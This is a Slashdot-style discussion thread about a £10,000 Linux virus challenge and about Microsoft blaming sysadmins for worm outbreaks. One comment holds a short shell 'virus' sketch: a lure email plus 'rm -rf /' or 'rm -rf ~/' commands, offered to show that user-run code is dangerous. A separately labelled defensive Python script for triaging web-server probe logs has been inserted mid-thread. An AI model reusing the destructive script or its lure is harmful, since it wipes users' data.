£10,000 Prize for Linux Virus Challenge Re-Issued
mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering £10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
How much does the British Pound weigh?
You have something above your lip.
So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!
...
I guess crime does pay
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
Drop the 'y', put a 're' in front.
TOUCH THIS! dah dun dun dun dun dah dah dah dun dun dund
I bet with 10,000 pounds I could infect him with a virus, if you know what I mean.
The site download.microsoft.com is running Microsoft-IIS/5.0 on Linux.
What, that's like $2 in American money?
And will you be called a "gifted programmer" a "security expert" or a "terrorist"?
In these times and with all of what's happening with all the laws passed, I wouldn't even dare touch that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proof and still convicted, etc etc).
--- Metamoderating abusive downgraders since my 300th post.
Keep in mind that default Redhat installation ships with many bugs that all need to be patched. Saying someone can't hack this kid's Linux box is a reason not to trust MS is just plain stupid. If IT dept. would patch their software and not open idiot attachments you couldn't infect MS BOXES EITHER. It's all about PATCHING, no matter which OS you use.
Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and it's extremely hard to infect an NT system as well.
You can't compare an upgraded and constantly patched Linux box to a default Win2k installation.
Does anyone else think that it is irresponsible to try to persuade virus writers to target Linux? What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Let the virus kiddies stick to targeting Windoze.
HH
Does he just want his linux box destroyed or does it have to be a virus? He can give me his address, I'll gladly fly down to his house and smash up his linux box with a bat for 10,000 pounds (that's around 14,534 dollars and 22 cents).
It sure is!
I'm guessing the virus writers gave up already. I'm sure 10,000 pounds is not worth the time of two years. It sounds to me that it's impossible. They should increase that amount by an exponent of 100 and see what happens.
But it's even more funny that they have to pay people to attempt to write a virus, on a free and open source system. This only means one thing...Linux really works!
meaning they don't download critical updates 5 times a day the second the next new virus is released (as if they even have a fix for it that fast)
If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.
now we need to go OSS in diesel cars
Found on the same site Virus & Hacking
-- ZeroZenith
If he doesn't run his email attachments he'll be safe. What's the big deal?
I agree that some of the responsibility lies with the sysadmin, but then again, the OS should be designed well enough that the patches are minimal.
I work in an enterprise unix environment and getting time for outages to apply patches is incredibly tough when you are running 24x7 systems that are critical to the operation of the customer.
Sure, we try to patch systems when we find out about security holes, but there comes a time when you cannot simply afford to take your systems down every week to apply new patches. Now I don't deal with MS stuff so I can't comment authoritatively, but it seems that the number of patches with MS products is never ending. This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
The university starts later than most (Sept. 28), and I started getting this round of hits about the same time the Dorms opened up.
Problem is, the university doesn't seem to be willing to do anything about it.
Today, I shall announce an award of $5 (CDN) to whoever can write a virus for a Mac...
So start coding... There is a lot of competition out there...
---
Programming is like sex... Make one mistake and support it the rest of your life.
cuz it dying on its own...
fuckin fools .
To be a real virus, it has to propagate to other machines, which is likely breaking the law.
So the 10,000 pounds will eventually end up in the pocket of a lawyer for defending you!
"...but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.
Squirm, MS, Squirm.
The technologically ignorant people will still entrust their computers to M$ because it is the standard, for now.
This SIG pulled due to lack of funding. (This damn war is costing too much!)
Two years ago, most programmers were fat and content in their dot com job and didn't really have too much spare time for such stuff.
Now with the job market in the shitter, I can see someone putting plenty of effort into coding a worm for Linux (especially for $10K). A lot of people now have nothing else to do except submit resumes and work on personal projects.
Hammer of Truth
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.
If we discourage people from trying to break systems, we end up with weak systems.
Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicious virus, and the damage will be far greater in that case. Think man.
I'll bet that if those gifted hackers using Linux entered this contest, it would only be a matter of time before someone did it. The problem is, none of these hackers using linux want to ruin the "secure" reputation of the OS by winning this contest. Instead of worrying about ruining its reputation, try and make a virus for it so the linux community can then come up with an update for the kernel or whatever to make it secure again.
"Be regular and orderly in your life, so that you may be violent and original in your work." -Flaubert
... provided you're not stupid.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23.
And please no DOS attacks....
OH.. no.. not at all.
They simply need an admin who is diligent about applying patches and staying informed.
Why does the CTO or CIO have to be involved? That's ridiculous.
Perhaps $ 1.000.000 makes sense. Nobody hurts himself for $15.000.
That's impossible man, they can't write a worm or virus.
Maybe for Apache or something.
But in any condition, it's impossible to spread like M$ worms.
[My english is better than most other people's Turkish, so please point out mistakes politely. Thank you.]
Because without the CTO or CIO's approval and backing, you can't get a damn thing done.
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
--just a thought. No intent to offend, etc.
I don't think Linux is more secure for this kind of thing
Short Answer: Anthrax isn't a virus.
I looked at netproject.com and couldn't find more details. What's the machine running, etc? Right now, my Linux box is behind my Windows box that only runs a web proxy. I'm also on dialup. Plus, my linux box is shut off right now. That makes it pretty secure, right? Seriously, if people only run their box with a web server and SSH, there's less of a chance of getting inside that if they ran many servers and had to worry about hacking from people with accounts on the box.
a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
Now huge success in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?
MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
the virus/worm or the patch?
Perhaps part of the problem with Microsoft Sysadmins is that these people should never have become sysadmins in the first place, but because being a sysadmin (used to) draw such a large salary that everyone wanted on the bandwagon, and Microsoft, in their infinite wisdom saw fit to make it so any idiot could push the button, and be a sysadmin too... The ex-Sysadmin where I used to work at was an idiot as far as actually working with servers was concerned. He subscribed to the "If there's no dialogue box for it, it can't be done" syndrome, and it was downright depressing. Far Far too often, we had problems with spam, viruses, and worms because he didn't bother to learn HOW to use the software at his disposal's advanced features to fix this stuff.
He was an MCSE too, so obviously these four letters aren't worth a pitcher of warm shit (to quote a famous American Revolutionary), and I'm glad that I'm NOT corrupted with any kind of Microsoft certification.
You know someone is going to say retarded, which might not be completely fair.
It has been said that no-one ever got fired for buying IBM (long ago), or Microsoft. This may be slowly changing. I don't know of many people who want to put their jobs on the line to protect the reputation of some other company.
"It is a greater offense to steal men's labor, than their clothes"
You guys should add "Gotcha" at the end, for the more gullible, or those that skim through and miss things like "open sores software"
I still find this unfunny, because it comes framed as a personal attack.
Letter To Iran
Considering that writing a virus could be considered terrorism, and prosecuted as such, I don't know that this would be the best idea...
Although, I would certainly like the 10k Pounds...
(Now, if only I knew how to input the Pound symbol on my US keyboard...)
-- Sometimes you have to turn the lights off in order to see.
I've seen hacking contests before. They're really freaking lame. The results are not often announced, it just disappears. Or you get everyone doing a DoS thinking that is hacking.
"Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."
Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a Linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But let's say a Linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to announcement to fix available. To claim that a Linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
turn on the M$ box. :)
While it is true that boxes need to be patched, it is also true that M$ does not really have a secured design nor is truly concerned with it. When I hear ppl complaining about patches on M$, all I can think of is a house with a deadlock on the front door, but with empty spaces where glass should be. The DeadLock is enough for M$ to say that they have security, but they design a lousy house.
It has been said already, but I think this is a pretty dangerous undertaking, it has been a few years now but there has been a pretty bad *IX worm out there.
It exploited security holes in Bind and some other projects which were (like Code Red and Nimda) known a FEW MONTHS before the worm came out.
The only reason why this hasn't happened to *UX systems lately is because a) Most script kiddies hate windowze systems b) because we (the *IX admins) have something to prove (the superiority of "our" system) we PATCH.
BUT since Linux is becoming more and more mainstream and used more and more at homes as small file servers or as internet routers and the sort a worm could have some devastating effects.
My 2 cts (BTW I am not defending Microsoft here)
Fighting for peace is like fucking for virginity
Windows allows all those not-so-smart people to spread viruses. Just look at all the viruses that spread the most, ones like MELISSA, ILOVEYOU, etc. these viruses worked so well not because they were so well done, but because people allowed them to perform well. Windows comes with many "features" that allow viruses to spread easily, yes, most can be disabled, but not many people do. As with Linux, most Linux deployments prevent most of these problems. They don't usually include so many "features" that aid in the spread of viruses. Also, most deployments of Linux are managed by much more experienced system administrators, and users alike. As MS attempts to make things "easier" for the general public (obviously we know why and it isn't just to make things easier), they make it "easier" for the spread of viruses, not that they want to, but their main concern is make things "easier" so that more people buy their software as opposed to software that's not so easy to use. As Linux developers attempt to make things "easier" they tend to think a lot more along the lines of keeping everything secure at the same time. Any business wants to make a larger profit and as MS starts seeing that security is just as important to stay on top as making things "easier", even more important really, then they will continue to work more on security. MS has realised this actually, the secure side of MS is NT and 2000, the not so secure side ME and XP. The user base again, being the least secure, the base which just so happens to be the ones that helped spread those great ILOVEYOU viruses and such. MS is split, the Linux community isn't so much, there is no business Linux OS or desktop Linux OS, there are just different distributions. As with most distributions, they focus on both security and ease-of-use, but because there is no central authority, anyone who's concerned with security works on that area, and those concerned with ease-of-use work on making software easier.
It isn't really about the OS, NT, 2K, Linux, BSD, BeOS, OSX, etc. it's about how they are developed and who maintains them that makes the difference between secure and not-so-secure. Hierarchy is not the best way to develop software, neither is running a business or government, or any organization. That is why democracy is better than communism or dictatorship, because they steer further from hierarchy.
Question everything.
Tardy:
tardy (adjective )
FORMAL
slow or late in happening or arriving
Dinner was somewhat delayed on account of David's rather tardy arrival
Avoiding viruses is really easy if you have some clue, no matter what the OS.
M$ offer up money for virus writers. Oh wait, they did. They designed Windows just so that Symantec and the other virus writers could also sell programs to defeat it.
This whole thing (M$, Symantec, and other viral companies) reminds me of zdnet having a CIO from a company who sells security programs for IIS saying that IIS is safe.
Bill Gates would do this too, but he can't afford it.
My Karma was at 49, then they switched to words. All that work for nothing!
... of one of my old OS prof's in college
during his OS course, if you were to root his box (it ran OpenBSD), report the contents of a certain file and how you broke in, you get an A and have your name listed as an OpenBSD contributor.
Ok, so someone used the CS Dept's main Sun server to launch a DoS attack against his machine. His box held up just fine (he says he was using it during the attack and didn't notice anything unusual happening). But the dept server, OTOH, sustained major damage. It needed rebooting, and it crashed during reboot.
The dept head was not happy. The guy had to cancel that challenge because it apparently violated university policy.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
I agree with Microsoft, in part.
Having been responsible some time ago for the maintenance of both systems (NT and Unix) I always found it easier to maintain all the different flavors of Unix (Linux, Solaris, BSD) than WinNT. Win2000 might have changed that, but I'm no longer administering MS based systems.
The main appeal of MS systems is the "Zero cost of ownership" (or whatever it's called), so it attracts lots of people with "zero sysadmin experience" who just pop in the cd and install nt+iis+exchange in a day or less, never again returning to so much as check the windows update page. I have a couple of customers who, to this day, are still vulnerable to code-red and nimda.
And no amount of warnings makes them take action until ISPs start blocking them... it's almost the same with the SPAM problem.
No sig
"....Eddie Bleasdale, has reiterated his pledge to give £10,000 to anyone who can infect his Linux computer with a virus."
This is famous, because it's Loud. Tomorrow if a Windows 2000 Admin comes and says the same thing about his "correctly configured system", I'm sure nobody will be able to do anything EXCEPT for Microsoft Employees (or the code thieves...) who know of an undetected backdoor somewhere hidden underneath layers of Windows.
But then, the same can be expected of a bug in Open Source which nobody has carefully examined till yet (it's possible...quite possible).
More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.
"but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins"
;)
It's many many many times easier to press 'SETUP' than it is to read a bugtraq every few days.
Maybe Microsoft could change the setup procedure so you HAVE to read many pages before your system works. At least you've proven that you can read.
Bit like Linux. Read and search for hours to get something working.
No. Just kidding, but the click-wait-and-beproudofyourserver is also too easy. Last few weeks I've been probed by several MServers with the 'congratulated with your new server' screen as opening-screen. As I see it many of those servers are made by A: people who are curious about what it's like to have _their own_ server and B: install the server with illegal software and C: never have heard of 'patches' and 'upgrades'.
Privacy is terrorism.
All I need is access to your CD-ROM drive and a Windows CD!!
My life is one big siesta in which I'm dreaming I wished my life was one big siesta.
I was the security "expert" at my last job, being the only person who really knew anything about security issues.
I was hampered from doing my job because of the way the network was set up when I got there. People resisted change.
Then, a FTP server someone else set up became an mp3 server one night. What a shock!
In other words, if you're going to institute security, people have to actually listen to you and, essentially, do what you say. You need to be the one with the power, not the one who's told what to do. That kind of edict can [usually] only come from the top.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
Secure systems do not exist, everything is exploitable one way or another, viruses are just a form of exploitation with primary objective known as destruction. Saying that one system is more secure or virus prone is just plain ignorant. It is impossible for an OS designer to take into account everything, and run every possible test case against it. It is true however that as the level of complexity of the system increases the more insecure it becomes.
The Constitution is NOT a suicide pact.
And quotes from Tom Clancy books are hardly divine wisdom.
To my knowledge, the Webstar reward still stands. The contest crack I suggested stems from a pcweek contest, the winner of which (jfs) exploited the third party PhotoAds software. jfs was partially successful against the crack.linuxppc.org. Details here...
Before people start slamming the Gartner report again, I hope they've read it. People seem to be under the impression that Gartner said that IIS simply wasn't secure and that other things are better - and that the response to this is 'duh, any machine which isn't updated isn't secure'. That isn't a valid response at all, because what Gartner very specifically said was not that IIS couldn't be secured, but that it is simply uneconomical because of the time and effort it takes to update IIS.
I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
FORMAL
slow or late in happening or arriving
retard
verb
1 : to slow up especially by preventing or hindering advance or accomplishment
It should be of note that there does not exist a noun "retard". However, if one is tardy, then, by definition, he is or has been retarded.
e.g. if a fire's arrival to your house is tardy, you could say that it has been retarded by the firemen.
I think you mean tarded for using MS server software.
Blah Blah Blah
You're right about RedHat. They throw together the worst Linux distro.
RedHat has lost track of the whole idea of a distro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
Not RedHat..
The whole point is you shouldn't need to patch it.
The defects found in RedHat and Windows are really stupid.
Yeah don't run attachments.. smart idea.. Let's remember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.
Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the OS developers in mind.. not the average user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.
Now before we get further on the "RedHat".. RedHat is not Linux... RedHat is one single distro that competes with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.
Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achieved the title of "all time most buggy".
But those companies went away. Pushed under by Sun Microsystems long before Linux saw the light of day.
Yes you can pick out a Linux distro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead distro.
So you can't just buy the first Linux distro on the shelves any more than you could buy the first used car you see.
But you can't shop around for a better Windows.
Finally as I understand Windows admins are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
That fear doesn't seem to be shared by Linux counterparts.
Ideally a Linux distro should be fine out of the box needing no patching. Not all distros have this advantage so you do need to shop around.
A lot more preferable to patching Windows and hoping the patches don't make things worse.
Basically for Linux you need to train users there is no way around this.
If you want Windows to work correctly you have to train the users as well.
Now what advantage did Windows have over Linux? Not needing to train anybody.
Oh.. yeah well I guess that's not the case anymore.
There aren't any viruses for Linux at the moment.
If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
I don't actually exist.
I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.
I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...
The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.
But I won't accept that MS can claim any sort of innocence on this. What about other
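The log triage that comment describes (picking the "cmd.exe" and "root.exe" requests out of an Apache access log and grouping them by source), as an added example that is not part of the original post; it stops at a per-source summary suitable for an abuse report. The log lines are constructed, the addresses come from documentation ranges, and every function name is this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Common/Combined Log Format prefix: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# File names the comment mentions; extend as needed.
PROBE_NAMES = ("cmd.exe", "root.exe")

# Constructed sample input (not taken from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Oct/2001:03:14:07 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
192.0.2.10 - - [02/Oct/2001:03:14:08 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
198.51.100.7 - - [02/Oct/2001:04:01:55 -0400] "GET /index.html HTTP/1.1" 200 5120
198.51.100.7 - - [02/Oct/2001:04:02:10 -0400] "GET /docs/cmd.exe.html HTTP/1.1" 200 2048
203.0.113.99 - - [02/Oct/2001:05:30:00 -0400] "GET /MSADC/Root.exe?/c+dir HTTP/1.0" 404 275
203.0.113.99 - - [02/Oct/2001:05:30:02 -0400] "GET /about.html HTTP/1.0" 200 900 "http://example.test/cmd.exe" "-"
this line is not in access-log format
"""


def normalise_path(raw, max_rounds=3):
    """Percent-decode (possibly nested encodings), unify slashes, lowercase."""
    path = raw
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def probe_name(request):
    """Return the probed file name if the request targets one, else None.

    Only the final path segment is compared, so /docs/cmd.exe.html or a
    Referer that happens to contain "cmd.exe" is not counted as a probe.
    """
    parts = request.split()
    target = parts[1] if len(parts) >= 2 else request
    path = normalise_path(target.split("?", 1)[0])
    leaf = path.rsplit("/", 1)[-1]
    return leaf if leaf in PROBE_NAMES else None


def summarise(lines):
    """Group probe requests by source host; also count unparseable lines."""
    per_host = {}
    malformed = 0
    for line in lines:
        line = line.strip()
        if not line:
            continue
        match = LOG_RE.match(line)
        if match is None:
            malformed += 1
            continue
        name = probe_name(match.group("request"))
        if name is None:
            continue
        record = per_host.setdefault(
            match.group("host"),
            {"hits": 0, "names": Counter(), "first": match.group("time"), "last": None},
        )
        record["hits"] += 1
        record["names"][name] += 1
        record["last"] = match.group("time")
    return per_host, malformed


def render_report(per_host):
    """One line per source, busiest first, for pasting into an abuse report."""
    ordered = sorted(per_host.items(), key=lambda kv: (-kv[1]["hits"], kv[0]))
    return [
        f"{host} hits={rec['hits']} first=[{rec['first']}] last=[{rec['last']}] "
        f"files={','.join(sorted(rec['names']))}"
        for host, rec in ordered
    ]


if __name__ == "__main__":
    hosts, bad = summarise(SAMPLE_LOG.splitlines())
    print("\n".join(render_report(hosts)))
    print(f"unparsed lines: {bad}")
```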
Tardiness basically means lateness, so, do they honestly think it has anything to do with that?
They must think microsheeple are dumb, and assume everyone else is.
Being tardy has nothing to do with it.
THEY ARE BIG LIARS, PLAIN AS DAY.
This has to be the most poorly researched article I've ever seen. What is this? "I heard Eddie say that he'd give Sophos a bucket load of money if they could infect his Linux box" becomes news? For a start, there are already Unix viruses and they have been reported in the wild. What is all this stuff about "hackers" and "exploits" about? Are we talking about worms or viruses or what? Where is the actual written declaration of the challenge? Who is the third party holding the cash in escrow? How is the challenge supposed to work? Surely Ed isn't suggesting that he will track down and award the author of any virus that ends up on his machine. Surely Ed isn't trying to incite people to write actual viruses and release them into the wild. I have emailed netproject.com, maybe the original "reporter" should have done this, it's called basic research. BTW - I heard Bill Gates said he'd give $1,000,000 to anyone who can sneak a woopie cushion onto his chair before he sits down on monday, should I look for the Slashdot article?
How we know is more important than what we know.
... we just need to convince him somehow that he needs to open email attachments. Any of us could make an executable that would dispose of his machine and we'd collect the reward. But he wouldn't run it for us like so many Windows users would. Linux is JUST as vulnerable to 90% of the types of Windows viruses that are out there... its users just often aren't.
Yeah.. they were too lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!
Only 'flamers' flame!
Obviously, MICROSOFT'S problem with IIS is the fact the tardy sysadms located the flaws in IIS design.
Not bad for flunkies. I expect this is how CS people pass the blame around.
What's the point of writing a virus for linux.. so you can infect 2-5% of the machines in the world? Wow.
Linux doesn't need a virus anyway, it's dying on its own.
The people who wrote the Constitution could never have imagined that inhuman people like the Islamic terrorists would exist some day.
Oh yes, we'll redefine "human" to exclude our enemies, what a great idea. With morons like you around these conflicts will be perpetuated forever.
go away AC
Posting as directed.
I tend to bash WinXXXX as the next Slashdotter, with good reasons, but netstat exists on Win2k too... check your facts first.. :)
Wow. What a vivid case of your everyday ignorant person. Your awe inspiring use of the term 'gay' as a derogatory adjective is obvious testimony to your vast vocabulary. Thanks for making /. a better place...
Posting as directed.
Nah that's Windows you're thinking of..
"WebTV: bringing the Internet into the shallow end of the gene pool since 1995" - Martin Bishop
I have been reading through the posts and I've seen people saying that patch and don't get infected etc. My question is, how will you patch something that doesn't exist. I mean if a virus doesn't exist then there is no patch for that virus. You will get a patch after a virus has been discovered, and a patch has been released. But until then it might be too late. Somebody said (in a previous thread) that if an OS was designed with security in mind the patches would be to a minimum. I agree to that and I like to say that it's not the admin's fault. If MS had not all these security holes then maybe a few patches would "close" the holes and admins would be able to keep up with the patches.
Viruses and other exploits don't happen because of mere sloppy coding. It is rather arrogance and/or poor design (which I guess are the same thing). And this is not limited to proprietary software either.
A well-designed secure program generally assumes that it will be compromised and has safeguards to limit impact of such a compromise. For example, think of what you can do if you compromise IIS or Sendmail, and compare with a compromise of Qmail or Apache (assuming you could compromise Qmail). IIS, Outlook, and other Microsoft products suffer from this problem.
So, people will say that the *nix world is much better (and forget the lessons learned from the Morris Worm). The kernels are very stable, but it is the network services which are the most vulnerable. Remember that root has to run the process if it binds to a port below 1024, so many network daemons are run exclusively by root. If I were into this area, I would be targeting these services (BIND, Sendmail, Tux, Websphere, etc.) rather than the older viruses. Tux represents an interesting case in point because it can have no safeguards except for very careful coding (and NO coding will ever be perfect) as it runs in kernel mode.
Now there is one other thing that was not said... Does the virus have to be Linux specific, or can I use an old-fashioned boot-sector virus?
LedgerSMB: Open source Accounting/ERP
Too late, GPL virus has already been there done that.
Virus means Anthrax is out.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
You are both defending Microsoft and you are flat out wrong. Linux *DOES* not have the virus-spreading email programs and other software that populates the Windows environment.
Hmmm.... So.... If Microsoft were to release Outlook for Linux, then we would be insecure too? The weak point of *nix is that only programs running as root can bind to ports below 1024 which means that most network services MUST run as root, and few have worker processes with fewer restrictions, like Apache does.
So how about a change in paradigm? How about ditching this whole concept of requiring network services to run as root and have a "netd" group which would be allowed to do this but not required to be root. We already sort of hack this by using xinetd and inetd, so why not create a new, more secure standard that would do more to prevent serious exploits and hence possibly viruses as well?
LedgerSMB: Open source Accounting/ERP
only I don't know which part of what I wrote resembled some Tom Clancy quote. I wrote my comment without assistance or plagiarizing, because my thoughts are my own.
I don't think this is a fair comparison. On one hand, you have a person that has locked down his machine with the latest patches, the highest security settings, firewalls, etc... And we're comparing it to a WinNT Administrator that has not patched his systems since the first install.
Windows servers could be as secure as Linux if the administrators take the time into securing their servers
Linux servers could be as insecure as a Win Server if the admin doesn't take the time into patching the system.
It's just a matter of the admin. As an administrator of a relatively small institution, it is often difficult for me to be on top of every patch that is available. We have 3 live servers and 1 backup server. It is a great deal to ensure that the patch is not detrimental to our applications, finding time to patch the systems that works with the users, and actually doing it. System patches are often done on weekends or Friday nights and doing a bunch of patches at the same time. There is a level of acceptable risks that you must take when you are dealing with live servers.
Has anyone else encountered situations like this? How have you dealt with it?
_______________________________
"I'm not Conceited...I'm just a realist..."
Modding down this comment due to other comments is absurd. Sure, maybe I did make bad comments in the past, but does that justify modding down for future comments that aren't really bad?
Also, you should remember that both sides of a point should be taken, not everything has to agree with the majority. Back in the day a "spherical world" was extremely unpopular.
Do you happen to work for MS?, hehe
Question everything.
#!/bin/sh
#
# TODO:
# Parse e-mail address' out of browser's cache
# Send program as attachment in e-mail
# Program untested, you'll get the idea anyway...
#
echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf
if[ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~/
fi
The program can be considered a virus. While it is blatantly clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
So, let me get this straight. "Tardy" is a corporate euphemism for "retarded", right?
Sysadmins would not be put in such a position if M$ idiots actually had some settings turned _off_ by default. :-)
I know that is a hard concept for some) when unfortunately these things have to be installed (the client is the other half of the story
I will pay $1000 dollars to the first slashbotter who can infect my bum with a penguin.
This is totally off topic (well not totally), but I have to tell someone, it's just too bizarre.
;)
This SirCam virus is a wild ride. It's hitting Outlook users and mailing out random files. I just got a copy of a letter (in email) saying I needed to register as a "Sex Offender" in Arkansas. I was shocked and horrified at this at first. Turns out a friend of mine is a lawyer for the state of Arkansas, and he had a copy of this on his hard drive. He was struck by the SirCam.
I managed to sort out what it was because I noticed an attachment, that poking at it, it was the SirCam virus. Too bad I run linux, everyone in my outbox could have been tortured with slashdot rants
New competition:
I am willing to be rewarded with 1$ if I write an MS Virus.
New improved competition. Higher standards:
I am willing to be rewarded with 1$ if I manage to write a MS virus (blindfolded), both hands back, only with a straw, waterproof old 8088 with edlin, being chained and sunk within water.
Read the parent post before you moderate.
The Constitution is NOT a suicide pact.
Hmmm, "Give me liberty or give me death"
And it's terrorists, not "Islamic terrorists". Osama is enough over the wall that his own family has disowned him.
We give up our (not "so called") rights, guess what? The terrorists just won. Doesn't matter who we bomb, catch, whatever.
Tardy is like 5 minutes, not half a fucking year. Let's be honest here, these sysadmins are not tardy, they are goddamn incompetent.
1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcf
"No nation could preserve its freedom in the midst of continual warfare."
--James Madison
What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who thinks that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.
Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.
I know if his system gets infected by a virus this will result in a patch and the system becoming more secure. But I hope for the sake of the reputation of an OS that prides itself in being more secure than proprietary alternatives and for the sake of this guy's wallet that nobody ever wins the money. It would be sad to see this stunt to prove the security of a well maintained linux box backfire.
---- Emacs is a nice OS - but it lacks a good text editor. That's why I am using Vim.
"Madness is something rare in individuals - but in groups, parties, peoples, ages it is the rule." -- Nietzsche
This is patently offensive. I have a cousin who is retarded and it's very demeaning to hear someone of dull normal intelligence called a 'tard'. Microsoft should apologize to the mentally challenged for using this disgusting euphemism.
Most likely he considers the opportunity to study these attempts in a controlled environment more valuable than the money anyway. In a world where most warranties say something like "Not guaranteed to be suitable for any purpose", I find this approach most refreshing. Try and find commercially produced software that states that it's suitable even for the purpose it was manufactured for.
I hope for his sake running outlook and IE 5.5 in wine is out-of-bounds. I read a while back where the wine crew considered getting a virus to be a major milestone achievement in compatibility.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If he is running Wine, I'll just send him SirCam... But do Windows virii count?
LedgerSMB: Open source Accounting/ERP
I was there! I saw it with my own eyes :)
"The defects found in RedHat and Windows are really stupid."
